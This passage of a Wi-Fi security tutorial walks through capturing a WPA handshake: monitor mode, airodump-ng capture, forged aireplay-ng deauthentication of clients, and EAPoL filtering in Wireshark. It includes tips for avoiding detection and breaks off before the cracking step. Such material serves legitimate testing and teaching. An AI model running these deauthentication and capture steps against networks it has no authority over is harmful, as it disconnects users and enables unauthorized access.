Passive attacks have the advantage of being undetectable because they only listen to traffic from the target network. But if your target doesn't have a lot of traffic, you can wait a long time to capture the four-way handshake. Fortunately, you have the faster, but less-stealthy option of running an active attack.
Using the information we gathered with Kismet during the recon step, we can send associated client(s) of the target AP forged deauthentication packets, which should cause the client(s) to disassociate from the AP. We then listen for the reassociation and subsequent authentication.
After identifying our target AP with associated clients, we need to set up the wireless hardware for packet injection. The aircrack suite has a little bash script to do just that.
First bring down the managed VAP (Virtual Access Point) with:
airmon-ng stop ath0
Figure 2: Bringing down the managed interface
Next, start up a VAP in "Monitor" mode:
airmon-ng start wifi0
Figure 3: Creating a monitor mode interface
Now we need to simultaneously deauthenticate a client and capture the resulting reauthentication. Open up two terminal windows. Start airodump-ng in one terminal:
airodump-ng -w capture_file_prefix --channel channel_number interface
airodump-ng -w cap --channel 6 ath0
Figure 4: airodump-ng, up and running
Next, run the deathentication attack with aireplay-ng in the other terminal:
aireplay-ng --deauth 1 -a MAC_of_AP -c MAC_of_client interface
aireplay-ng --deauth 1 -a 00:18:E7:02:4C:E6 -c 00:13:CE:21:54:14 ath0
Figure 5: A successfully sent deathentication packet
If all goes well, the client should be deauthenticated from the AP and will usually reauthenticate. If remaining undetected is important, send only one deauth and be patient. This helps keep you under the radar, since programs like Kismet can detect deauthentication floods.
If the deauthentication was successful, airodump-ng displays a notification of the captured reauthentication event (boxed in red in Figure 6).
Figure 6: Successful WPA handshake capture
Finding the Four-way Handshake
To make sure we captured an authentication handshake, we can use the network protocol analyzer Wireshark (formerly Ethereal). Wireshark allows us to view packet contents and sort by type of packet captured to pull out the WPA handshake.
Open up Wireshark (Backtrack > Privilege Escalation > Protocol Analysis > Network Sniffers > WireShark) and open the Kismet capture "dump" file (Kismet-
Using Wireshark, we can filter the captured packets to display only EAPoL packets by entering "eapol" in the filter field (Figure 7).
Figure 7: EAPoL filter applied to captured packets
Here, we're basically looking for four packets that alternate source, client-AP-client-AP (I've highlighted them in red in Figure 7).
Now that we've confirmed that we've captured a four-way handshake, it's time to perform the crack.